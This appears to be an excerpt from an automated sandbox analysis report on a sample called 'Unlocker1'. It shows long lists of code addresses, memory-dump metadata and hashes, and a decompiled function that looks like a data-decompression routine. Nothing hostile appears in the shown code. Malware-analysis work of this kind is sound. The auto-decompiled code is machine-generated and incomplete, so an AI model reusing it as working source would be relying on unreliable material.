                                                                                                                                                              0x00406397
                                                                                                                                                              0x0040639a
                                                                                                                                                              0x0040639d
                                                                                                                                                              0x00406392
                                                                                                                                                              0x00406392
                                                                                                                                                              0x00406392
                                                                                                                                                              0x004063a0
                                                                                                                                                              0x004063a3
                                                                                                                                                              0x004063a6
                                                                                                                                                              0x004063a6
                                                                                                                                                              0x004063a9
                                                                                                                                                              0x004063ac
                                                                                                                                                              0x004063af
                                                                                                                                                              0x004063af
                                                                                                                                                              0x004063b2
                                                                                                                                                              0x004063b9
                                                                                                                                                              0x004063be
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0040644c
                                                                                                                                                              0x0040644c
                                                                                                                                                              0x00406450
                                                                                                                                                              0x004067ee
                                                                                                                                                              0x00000000
                                                                                                                                                              0x004067ee
                                                                                                                                                              0x00406456
                                                                                                                                                              0x00406459
                                                                                                                                                              0x0040645c
                                                                                                                                                              0x00406460
                                                                                                                                                              0x00406463
                                                                                                                                                              0x00406469
                                                                                                                                                              0x0040646b
                                                                                                                                                              0x0040646b
                                                                                                                                                              0x0040646b
                                                                                                                                                              0x0040646e
                                                                                                                                                              0x00406471
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00406041
                                                                                                                                                              0x00406041
                                                                                                                                                              0x00406045
                                                                                                                                                              0x004067b2
                                                                                                                                                              0x00000000
                                                                                                                                                              0x004067b2
                                                                                                                                                              0x0040604b
                                                                                                                                                              0x0040604e
                                                                                                                                                              0x00406051
                                                                                                                                                              0x00406055
                                                                                                                                                              0x00406058
                                                                                                                                                              0x0040605e
                                                                                                                                                              0x00406060
                                                                                                                                                              0x00406060
                                                                                                                                                              0x00406060
                                                                                                                                                              0x00406063
                                                                                                                                                              0x00406066
                                                                                                                                                              0x00406066
                                                                                                                                                              0x00406069
                                                                                                                                                              0x0040606c
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00406072
                                                                                                                                                              0x00406078
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0040607e
                                                                                                                                                              0x0040607e
                                                                                                                                                              0x00406082
                                                                                                                                                              0x00406085
                                                                                                                                                              0x00406088
                                                                                                                                                              0x0040608b
                                                                                                                                                              0x0040608e
                                                                                                                                                              0x0040608f
                                                                                                                                                              0x00406092
                                                                                                                                                              0x00406094
                                                                                                                                                              0x0040609a
                                                                                                                                                              0x0040609d
                                                                                                                                                              0x004060a0
                                                                                                                                                              0x004060a3
                                                                                                                                                              0x004060a6
                                                                                                                                                              0x004060a9
                                                                                                                                                              0x004060ac
                                                                                                                                                              0x004060c8
                                                                                                                                                              0x004060cb
                                                                                                                                                              0x004060ce
                                                                                                                                                              0x004060d1
                                                                                                                                                              0x004060d8
                                                                                                                                                              0x004060dc
                                                                                                                                                              0x004060de
                                                                                                                                                              0x004060e2
                                                                                                                                                              0x004060ae
                                                                                                                                                              0x004060ae
                                                                                                                                                              0x004060b2
                                                                                                                                                              0x004060ba
                                                                                                                                                              0x004060bf
                                                                                                                                                              0x004060c1
                                                                                                                                                              0x004060c3
                                                                                                                                                              0x004060c3
                                                                                                                                                              0x004060e5
                                                                                                                                                              0x004060ec
                                                                                                                                                              0x004060ef
                                                                                                                                                              0x00000000
                                                                                                                                                              0x004060f5
                                                                                                                                                              0x00000000
                                                                                                                                                              0x004060f5
                                                                                                                                                              0x00000000
                                                                                                                                                              0x004060fa
                                                                                                                                                              0x004060fa
                                                                                                                                                              0x004060fe
                                                                                                                                                              0x004067be
                                                                                                                                                              0x00000000
                                                                                                                                                              0x004067be
                                                                                                                                                              0x00406104
                                                                                                                                                              0x00406107
                                                                                                                                                              0x0040610a
                                                                                                                                                              0x0040610e
                                                                                                                                                              0x00406111
                                                                                                                                                              0x00406117
                                                                                                                                                              0x00406119
                                                                                                                                                              0x00406119
                                                                                                                                                              0x00406119
                                                                                                                                                              0x0040611c
                                                                                                                                                              0x0040611f
                                                                                                                                                              0x0040611f
                                                                                                                                                              0x0040611f
                                                                                                                                                              0x00406125
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00406127
                                                                                                                                                              0x0040612a
                                                                                                                                                              0x0040612d
                                                                                                                                                              0x00406130
                                                                                                                                                              0x00406133
                                                                                                                                                              0x00406136
                                                                                                                                                              0x00406139
                                                                                                                                                              0x0040613c
                                                                                                                                                              0x0040613f
                                                                                                                                                              0x00406142
                                                                                                                                                              0x00406145
                                                                                                                                                              0x0040615d
                                                                                                                                                              0x00406160
                                                                                                                                                              0x00406163
                                                                                                                                                              0x00406166
                                                                                                                                                              0x00406166
                                                                                                                                                              0x00406169
                                                                                                                                                              0x0040616d
                                                                                                                                                              0x0040616f
                                                                                                                                                              0x00406147
                                                                                                                                                              0x00406147
                                                                                                                                                              0x0040614f
                                                                                                                                                              0x00406154
                                                                                                                                                              0x00406156
                                                                                                                                                              0x00406158
                                                                                                                                                              0x00406158
                                                                                                                                                              0x00406172
                                                                                                                                                              0x00406179
                                                                                                                                                              0x0040617c
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0040617e
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0040617e
                                                                                                                                                              0x0040617c
                                                                                                                                                              0x00406183
                                                                                                                                                              0x00406183
                                                                                                                                                              0x00406183
                                                                                                                                                              0x00406183
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x004061be
                                                                                                                                                              0x004061be
                                                                                                                                                              0x004061c2
                                                                                                                                                              0x004067ca
                                                                                                                                                              0x00000000
                                                                                                                                                              0x004067ca
                                                                                                                                                              0x004061c8
                                                                                                                                                              0x004061cb
                                                                                                                                                              0x004061ce
                                                                                                                                                              0x004061d2
                                                                                                                                                              0x004061d5
                                                                                                                                                              0x004061db
                                                                                                                                                              0x004061dd
                                                                                                                                                              0x004061dd
                                                                                                                                                              0x004061dd
                                                                                                                                                              0x004061e0
                                                                                                                                                              0x004061e3
                                                                                                                                                              0x004061e3
                                                                                                                                                              0x004061e9
                                                                                                                                                              0x00406187
                                                                                                                                                              0x00406187
                                                                                                                                                              0x0040618a
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0040618a
                                                                                                                                                              0x004061eb
                                                                                                                                                              0x004061eb
                                                                                                                                                              0x004061ee
                                                                                                                                                              0x004061f1
                                                                                                                                                              0x004061f4
                                                                                                                                                              0x004061f7
                                                                                                                                                              0x004061fa
                                                                                                                                                              0x004061fd
                                                                                                                                                              0x00406200
                                                                                                                                                              0x00406203
                                                                                                                                                              0x00406206
                                                                                                                                                              0x00406209
                                                                                                                                                              0x00406221
                                                                                                                                                              0x00406224
                                                                                                                                                              0x00406227
                                                                                                                                                              0x0040622a
                                                                                                                                                              0x0040622a
                                                                                                                                                              0x0040622d
                                                                                                                                                              0x00406231
                                                                                                                                                              0x00406233
                                                                                                                                                              0x0040620b
                                                                                                                                                              0x0040620b
                                                                                                                                                              0x00406213
                                                                                                                                                              0x00406218
                                                                                                                                                              0x0040621a
                                                                                                                                                              0x0040621c
                                                                                                                                                              0x0040621c
                                                                                                                                                              0x00406236
                                                                                                                                                              0x0040623d
                                                                                                                                                              0x00406240
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00406242
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00406242
                                                                                                                                                              0x00000000
                                                                                                                                                              0x004064cf
                                                                                                                                                              0x004064cf
                                                                                                                                                              0x004064d3
                                                                                                                                                              0x004067fa
                                                                                                                                                              0x00000000
                                                                                                                                                              0x004067fa
                                                                                                                                                              0x004064d9
                                                                                                                                                              0x004064dc
                                                                                                                                                              0x004064df
                                                                                                                                                              0x004064e3
                                                                                                                                                              0x004064e6
                                                                                                                                                              0x004064ec
                                                                                                                                                              0x004064ee
                                                                                                                                                              0x004064ee
                                                                                                                                                              0x004064ee
                                                                                                                                                              0x004064f1
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0040629f
                                                                                                                                                              0x0040629f
                                                                                                                                                              0x004062a2
                                                                                                                                                              0x00406614
                                                                                                                                                              0x00406614
                                                                                                                                                              0x00406614
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00406614
                                                                                                                                                              0x00000000
                                                                                                                                                              0x004065de
                                                                                                                                                              0x004065e2
                                                                                                                                                              0x00406604
                                                                                                                                                              0x00406607
                                                                                                                                                              0x00406611
                                                                                                                                                              0x00406614
                                                                                                                                                              0x00406614
                                                                                                                                                              0x00406614
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00406614
                                                                                                                                                              0x00406614
                                                                                                                                                              0x004065e4
                                                                                                                                                              0x004065e7
                                                                                                                                                              0x004065eb
                                                                                                                                                              0x004065ee
                                                                                                                                                              0x004065ee
                                                                                                                                                              0x004065f1
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0040669b
                                                                                                                                                              0x0040669f
                                                                                                                                                              0x004066bd
                                                                                                                                                              0x004066bd
                                                                                                                                                              0x004066bd
                                                                                                                                                              0x004066c4
                                                                                                                                                              0x004066cb
                                                                                                                                                              0x004066d2
                                                                                                                                                              0x004066d2
                                                                                                                                                              0x00000000
                                                                                                                                                              0x004066d2
                                                                                                                                                              0x004066a1
                                                                                                                                                              0x004066a4
                                                                                                                                                              0x004066a7
                                                                                                                                                              0x004066aa
                                                                                                                                                              0x004066b1
                                                                                                                                                              0x004065f5
                                                                                                                                                              0x004065f5
                                                                                                                                                              0x004065f8
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0040678c
                                                                                                                                                              0x0040678f
                                                                                                                                                              0x00406690
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x004063c6
                                                                                                                                                              0x004063c8
                                                                                                                                                              0x004063cf
                                                                                                                                                              0x004063d0
                                                                                                                                                              0x004063d2
                                                                                                                                                              0x004063d5
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x004063dd
                                                                                                                                                              0x004063e0
                                                                                                                                                              0x004063e3
                                                                                                                                                              0x004063e5
                                                                                                                                                              0x004063e7
                                                                                                                                                              0x004063e7
                                                                                                                                                              0x004063e8
                                                                                                                                                              0x004063eb
                                                                                                                                                              0x004063f2
                                                                                                                                                              0x004063f5
                                                                                                                                                              0x00406403
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x004066d9
                                                                                                                                                              0x004066d9
                                                                                                                                                              0x004066dc
                                                                                                                                                              0x004066e3
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x004066e8
                                                                                                                                                              0x004066e8
                                                                                                                                                              0x004066ec
                                                                                                                                                              0x00406824
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00406824
                                                                                                                                                              0x004066f2
                                                                                                                                                              0x004066f5
                                                                                                                                                              0x004066f8
                                                                                                                                                              0x004066fc
                                                                                                                                                              0x004066ff
                                                                                                                                                              0x00406705
                                                                                                                                                              0x00406707
                                                                                                                                                              0x00406707
                                                                                                                                                              0x00406707
                                                                                                                                                              0x0040670a
                                                                                                                                                              0x0040670d
                                                                                                                                                              0x0040670d
                                                                                                                                                              0x0040670d
                                                                                                                                                              0x0040670d
                                                                                                                                                              0x00406710
                                                                                                                                                              0x00406710
                                                                                                                                                              0x00406714
                                                                                                                                                              0x00406774
                                                                                                                                                              0x00406777
                                                                                                                                                              0x0040677c
                                                                                                                                                              0x0040677d
                                                                                                                                                              0x0040677f
                                                                                                                                                              0x00406781
                                                                                                                                                              0x00406784
                                                                                                                                                              0x00406690
                                                                                                                                                              0x00406690
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00406696
                                                                                                                                                              0x00406690
                                                                                                                                                              0x00406716
                                                                                                                                                              0x0040671c
                                                                                                                                                              0x0040671f
                                                                                                                                                              0x00406722
                                                                                                                                                              0x00406725
                                                                                                                                                              0x00406728
                                                                                                                                                              0x0040672b
                                                                                                                                                              0x0040672e
                                                                                                                                                              0x00406731
                                                                                                                                                              0x00406734
                                                                                                                                                              0x00406737
                                                                                                                                                              0x00406750
                                                                                                                                                              0x00406753
                                                                                                                                                              0x00406756
                                                                                                                                                              0x00406759
                                                                                                                                                              0x0040675d
                                                                                                                                                              0x0040675f
                                                                                                                                                              0x0040675f
                                                                                                                                                              0x00406760
                                                                                                                                                              0x00406763
                                                                                                                                                              0x00406739
                                                                                                                                                              0x00406739
                                                                                                                                                              0x00406741
                                                                                                                                                              0x00406746
                                                                                                                                                              0x00406748
                                                                                                                                                              0x0040674b
                                                                                                                                                              0x0040674b
                                                                                                                                                              0x00406766
                                                                                                                                                              0x0040676d
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0040676f
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0040676f
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0040640b
                                                                                                                                                              0x0040640e
                                                                                                                                                              0x00406444
                                                                                                                                                              0x00406574
                                                                                                                                                              0x00406574
                                                                                                                                                              0x00406574
                                                                                                                                                              0x00406574
                                                                                                                                                              0x00406577
                                                                                                                                                              0x00406577
                                                                                                                                                              0x0040657a
                                                                                                                                                              0x0040657c
                                                                                                                                                              0x00406806
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00406806
                                                                                                                                                              0x00406582
                                                                                                                                                              0x00406585
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0040658b
                                                                                                                                                              0x0040658f
                                                                                                                                                              0x00406592
                                                                                                                                                              0x00406592
                                                                                                                                                              0x00406592
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00406592
                                                                                                                                                              0x00406410
                                                                                                                                                              0x00406412
                                                                                                                                                              0x00406414
                                                                                                                                                              0x00406416
                                                                                                                                                              0x00406419
                                                                                                                                                              0x0040641a
                                                                                                                                                              0x0040641c
                                                                                                                                                              0x0040641e
                                                                                                                                                              0x00406421
                                                                                                                                                              0x00406424
                                                                                                                                                              0x0040643a
                                                                                                                                                              0x0040643f
                                                                                                                                                              0x00406477
                                                                                                                                                              0x00406477
                                                                                                                                                              0x0040647b
                                                                                                                                                              0x004064a7
                                                                                                                                                              0x004064a9
                                                                                                                                                              0x004064b0
                                                                                                                                                              0x004064b3
                                                                                                                                                              0x004064b6
                                                                                                                                                              0x004064b6
                                                                                                                                                              0x004064bb
                                                                                                                                                              0x004064bb
                                                                                                                                                              0x004064bd
                                                                                                                                                              0x004064c0
                                                                                                                                                              0x004064c7
                                                                                                                                                              0x004064ca
                                                                                                                                                              0x004064f7
                                                                                                                                                              0x004064f7
                                                                                                                                                              0x004064fa
                                                                                                                                                              0x004064fd
                                                                                                                                                              0x00406571
                                                                                                                                                              0x00406571
                                                                                                                                                              0x00406571
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00406571
                                                                                                                                                              0x004064ff
                                                                                                                                                              0x00406505
                                                                                                                                                              0x00406508
                                                                                                                                                              0x0040650b
                                                                                                                                                              0x0040650e
                                                                                                                                                              0x00406511
                                                                                                                                                              0x00406514
                                                                                                                                                              0x00406517
                                                                                                                                                              0x0040651a
                                                                                                                                                              0x0040651d
                                                                                                                                                              0x00406520
                                                                                                                                                              0x00406539
                                                                                                                                                              0x0040653b
                                                                                                                                                              0x0040653e
                                                                                                                                                              0x0040653f
                                                                                                                                                              0x00406542
                                                                                                                                                              0x00406544
                                                                                                                                                              0x00406547
                                                                                                                                                              0x00406549
                                                                                                                                                              0x0040654b
                                                                                                                                                              0x0040654e
                                                                                                                                                              0x00406550
                                                                                                                                                              0x00406553
                                                                                                                                                              0x00406557
                                                                                                                                                              0x00406559
                                                                                                                                                              0x00406559
                                                                                                                                                              0x0040655a
                                                                                                                                                              0x0040655d
                                                                                                                                                              0x00406560
                                                                                                                                                              0x00406522
                                                                                                                                                              0x00406522
                                                                                                                                                              0x0040652a
                                                                                                                                                              0x0040652f
                                                                                                                                                              0x00406531
                                                                                                                                                              0x00406534
                                                                                                                                                              0x00406534
                                                                                                                                                              0x00406563
                                                                                                                                                              0x0040656a
                                                                                                                                                              0x004064f4
                                                                                                                                                              0x004064f4
                                                                                                                                                              0x004064f4
                                                                                                                                                              0x004064f4
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0040656c
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0040656c
                                                                                                                                                              0x0040656a
                                                                                                                                                              0x0040647d
                                                                                                                                                              0x00406480
                                                                                                                                                              0x00406482
                                                                                                                                                              0x00406485
                                                                                                                                                              0x00406488
                                                                                                                                                              0x0040648b
                                                                                                                                                              0x0040648d
                                                                                                                                                              0x00406490
                                                                                                                                                              0x00406493
                                                                                                                                                              0x00406493
                                                                                                                                                              0x00406496
                                                                                                                                                              0x00406496
                                                                                                                                                              0x00406499
                                                                                                                                                              0x004064a0
                                                                                                                                                              0x00406474
                                                                                                                                                              0x00406474
                                                                                                                                                              0x00406474
                                                                                                                                                              0x00406474
                                                                                                                                                              0x00000000
                                                                                                                                                              0x004064a2
                                                                                                                                                              0x00000000
                                                                                                                                                              0x004064a2
                                                                                                                                                              0x004064a0
                                                                                                                                                              0x00406426
                                                                                                                                                              0x00406429
                                                                                                                                                              0x0040642b
                                                                                                                                                              0x0040642e
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0040618d
                                                                                                                                                              0x0040618d
                                                                                                                                                              0x00406191
                                                                                                                                                              0x004067d6
                                                                                                                                                              0x00000000
                                                                                                                                                              0x004067d6
                                                                                                                                                              0x00406197
                                                                                                                                                              0x0040619a
                                                                                                                                                              0x0040619d
                                                                                                                                                              0x004061a0
                                                                                                                                                              0x004061a3
                                                                                                                                                              0x004061a6
                                                                                                                                                              0x004061a9
                                                                                                                                                              0x004061ab
                                                                                                                                                              0x004061ae
                                                                                                                                                              0x004061b1
                                                                                                                                                              0x004061b4
                                                                                                                                                              0x004061b6
                                                                                                                                                              0x004061b6
                                                                                                                                                              0x004061b6
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00406318
                                                                                                                                                              0x00406318
                                                                                                                                                              0x0040631c
                                                                                                                                                              0x004067e2
                                                                                                                                                              0x00000000
                                                                                                                                                              0x004067e2
                                                                                                                                                              0x00406322
                                                                                                                                                              0x00406325
                                                                                                                                                              0x00406328
                                                                                                                                                              0x0040632b
                                                                                                                                                              0x0040632d
                                                                                                                                                              0x0040632d
                                                                                                                                                              0x0040632d
                                                                                                                                                              0x00406330
                                                                                                                                                              0x00406333
                                                                                                                                                              0x00406336
                                                                                                                                                              0x00406339
                                                                                                                                                              0x0040633c
                                                                                                                                                              0x0040633f
                                                                                                                                                              0x00406340
                                                                                                                                                              0x00406342
                                                                                                                                                              0x00406342
                                                                                                                                                              0x00406342
                                                                                                                                                              0x00406345
                                                                                                                                                              0x00406348
                                                                                                                                                              0x0040634b
                                                                                                                                                              0x0040634e
                                                                                                                                                              0x0040634e
                                                                                                                                                              0x0040634e
                                                                                                                                                              0x00406351
                                                                                                                                                              0x00406353
                                                                                                                                                              0x00406353
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00406595
                                                                                                                                                              0x00406595
                                                                                                                                                              0x00406595
                                                                                                                                                              0x00406599
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0040659f
                                                                                                                                                              0x004065a2
                                                                                                                                                              0x004065a5
                                                                                                                                                              0x004065a8
                                                                                                                                                              0x004065aa
                                                                                                                                                              0x004065aa
                                                                                                                                                              0x004065aa
                                                                                                                                                              0x004065ad
                                                                                                                                                              0x004065b0
                                                                                                                                                              0x004065b3
                                                                                                                                                              0x004065b6
                                                                                                                                                              0x004065b9
                                                                                                                                                              0x004065bc
                                                                                                                                                              0x004065bd
                                                                                                                                                              0x004065bf
                                                                                                                                                              0x004065bf
                                                                                                                                                              0x004065bf
                                                                                                                                                              0x004065c2
                                                                                                                                                              0x004065c5
                                                                                                                                                              0x004065c8
                                                                                                                                                              0x004065cb
                                                                                                                                                              0x004065ce
                                                                                                                                                              0x004065d2
                                                                                                                                                              0x004065d4
                                                                                                                                                              0x004065d7
                                                                                                                                                              0x00000000
                                                                                                                                                              0x004065d9
                                                                                                                                                              0x00406356
                                                                                                                                                              0x00406356
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00406356
                                                                                                                                                              0x004065d7
                                                                                                                                                              0x0040680c
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00405e3b
                                                                                                                                                              0x00406843
                                                                                                                                                              0x00406843
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00406843
                                                                                                                                                              0x00406690
                                                                                                                                                              0x00406617
                                                                                                                                                              0x00406614
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0040624b

                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.373612481.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.373605914.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.373620814.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.373626744.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.373626744.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.373626744.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.373626744.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.373664597.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Unlocker1.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID:
                                                                                                                                                              • Opcode ID: ab0e96aa9de7783a5fbfa8537471c17f47562fab6ccc56c1d015952012775d3a
                                                                                                                                                              • Instruction ID: 47c5cb8fc101d284839cddc633a7ca9263ac2e2456f843b1234a04abf02d33d1
                                                                                                                                                              • Opcode Fuzzy Hash: ab0e96aa9de7783a5fbfa8537471c17f47562fab6ccc56c1d015952012775d3a
                                                                                                                                                              • Instruction Fuzzy Hash: 0C713371D00229CBDF28CFA8C844BADBBF1FB44305F15806AD816BB281D7785A86DF54
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 00406365 Relevance: 5.2, APIs: 4, Instructions: 170COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              C-Code - Quality: 98%
                                                                                                                                                              			E00406365() {
				unsigned short _t531;
				signed int _t532;
				void _t533;
				signed int _t534;
				signed int _t535;
				signed int _t565;
				signed int _t568;
				signed int _t589;
				signed int* _t606;
				void* _t613;

				L0:
				while(1) {
					L0:
					if( *(_t613 - 0x40) != 0) {
						 *(_t613 - 0x84) = 0xb;
						_t606 =  *(_t613 - 4) + 0x1c8 +  *(_t613 - 0x38) * 2;
						goto L132;
					} else {
						__eax =  *(__ebp - 0x28);
						L88:
						 *(__ebp - 0x2c) = __eax;
						 *(__ebp - 0x28) =  *(__ebp - 0x2c);
						L89:
						__eax =  *(__ebp - 4);
						 *(__ebp - 0x80) = 0x15;
						__eax =  *(__ebp - 4) + 0xa68;
						 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
						L69:
						 *(__ebp - 0x84) = 0x12;
						while(1) {
							L132:
							 *(_t613 - 0x54) = _t606;
							while(1) {
								L133:
								_t531 =  *_t606;
								_t589 = _t531 & 0x0000ffff;
								_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
								if( *(_t613 - 0xc) >= _t565) {
									 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
									 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
									 *(_t613 - 0x40) = 1;
									_t532 = _t531 - (_t531 >> 5);
									 *_t606 = _t532;
								} else {
									 *(_t613 - 0x10) = _t565;
									 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
									 *_t606 = (0x800 - _t589 >> 5) + _t531;
								}
								if( *(_t613 - 0x10) >= 0x1000000) {
									goto L139;
								}
								L137:
								if( *(_t613 - 0x6c) == 0) {
									 *(_t613 - 0x88) = 5;
									L170:
									_t568 = 0x22;
									memcpy( *(_t613 - 0x90), _t613 - 0x88, _t568 << 2);
									_t535 = 0;
									L172:
									return _t535;
								}
								 *(_t613 - 0x10) =  *(_t613 - 0x10) << 8;
								 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
								 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
								 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
								L139:
								_t533 =  *(_t613 - 0x84);
								while(1) {
									 *(_t613 - 0x88) = _t533;
									while(1) {
										L1:
										_t534 =  *(_t613 - 0x88);
										if(_t534 > 0x1c) {
											break;
										}
										switch( *((intOrPtr*)(_t534 * 4 +  &M0040684B))) {
											case 0:
												if( *(_t613 - 0x6c) == 0) {
													goto L170;
												}
												 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
												 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
												_t534 =  *( *(_t613 - 0x70));
												if(_t534 > 0xe1) {
													goto L171;
												}
												_t538 = _t534 & 0x000000ff;
												_push(0x2d);
												asm("cdq");
												_pop(_t570);
												_push(9);
												_pop(_t571);
												_t609 = _t538 / _t570;
												_t540 = _t538 % _t570 & 0x000000ff;
												asm("cdq");
												_t604 = _t540 % _t571 & 0x000000ff;
												 *(_t613 - 0x3c) = _t604;
												 *(_t613 - 0x1c) = (1 << _t609) - 1;
												 *((intOrPtr*)(_t613 - 0x18)) = (1 << _t540 / _t571) - 1;
												_t612 = (0x300 << _t604 + _t609) + 0x736;
												if(0x600 ==  *((intOrPtr*)(_t613 - 0x78))) {
													L10:
													if(_t612 == 0) {
														L12:
														 *(_t613 - 0x48) =  *(_t613 - 0x48) & 0x00000000;
														 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
														goto L15;
													} else {
														goto L11;
													}
													do {
														L11:
														_t612 = _t612 - 1;
														 *((short*)( *(_t613 - 4) + _t612 * 2)) = 0x400;
													} while (_t612 != 0);
													goto L12;
												}
												if( *(_t613 - 4) != 0) {
													GlobalFree( *(_t613 - 4)); // executed
												}
												_t534 = GlobalAlloc(0x40, 0x600); // executed
												 *(_t613 - 4) = _t534;
												if(_t534 == 0) {
													goto L171;
												} else {
													 *((intOrPtr*)(_t613 - 0x78)) = 0x600;
													goto L10;
												}
											case 1:
												L13:
												__eflags =  *(_t613 - 0x6c);
												if( *(_t613 - 0x6c) == 0) {
													 *(_t613 - 0x88) = 1;
													goto L170;
												}
												 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
												 *(_t613 - 0x40) =  *(_t613 - 0x40) | ( *( *(_t613 - 0x70)) & 0x000000ff) <<  *(_t613 - 0x48) << 0x00000003;
												 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
												_t45 = _t613 - 0x48;
												 *_t45 =  *(_t613 - 0x48) + 1;
												__eflags =  *_t45;
												L15:
												if( *(_t613 - 0x48) < 4) {
													goto L13;
												}
												_t546 =  *(_t613 - 0x40);
												if(_t546 ==  *(_t613 - 0x74)) {
													L20:
													 *(_t613 - 0x48) = 5;
													 *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) =  *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) & 0x00000000;
													goto L23;
												}
												 *(_t613 - 0x74) = _t546;
												if( *(_t613 - 8) != 0) {
													GlobalFree( *(_t613 - 8)); // executed
												}
												_t534 = GlobalAlloc(0x40,  *(_t613 - 0x40)); // executed
												 *(_t613 - 8) = _t534;
												if(_t534 == 0) {
													goto L171;
												} else {
													goto L20;
												}
											case 2:
												L24:
												_t553 =  *(_t613 - 0x60) &  *(_t613 - 0x1c);
												 *(_t613 - 0x84) = 6;
												 *(_t613 - 0x4c) = _t553;
												_t606 =  *(_t613 - 4) + (( *(_t613 - 0x38) << 4) + _t553) * 2;
												L132:
												 *(_t613 - 0x54) = _t606;
												goto L133;
											case 3:
												L21:
												__eflags =  *(_t613 - 0x6c);
												if( *(_t613 - 0x6c) == 0) {
													 *(_t613 - 0x88) = 3;
													goto L170;
												}
												 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
												_t67 = _t613 - 0x70;
												 *_t67 =  &(( *(_t613 - 0x70))[1]);
												__eflags =  *_t67;
												 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
												L23:
												 *(_t613 - 0x48) =  *(_t613 - 0x48) - 1;
												if( *(_t613 - 0x48) != 0) {
													goto L21;
												}
												goto L24;
											case 4:
												L133:
												_t531 =  *_t606;
												_t589 = _t531 & 0x0000ffff;
												_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
												if( *(_t613 - 0xc) >= _t565) {
													 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
													 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
													 *(_t613 - 0x40) = 1;
													_t532 = _t531 - (_t531 >> 5);
													 *_t606 = _t532;
												} else {
													 *(_t613 - 0x10) = _t565;
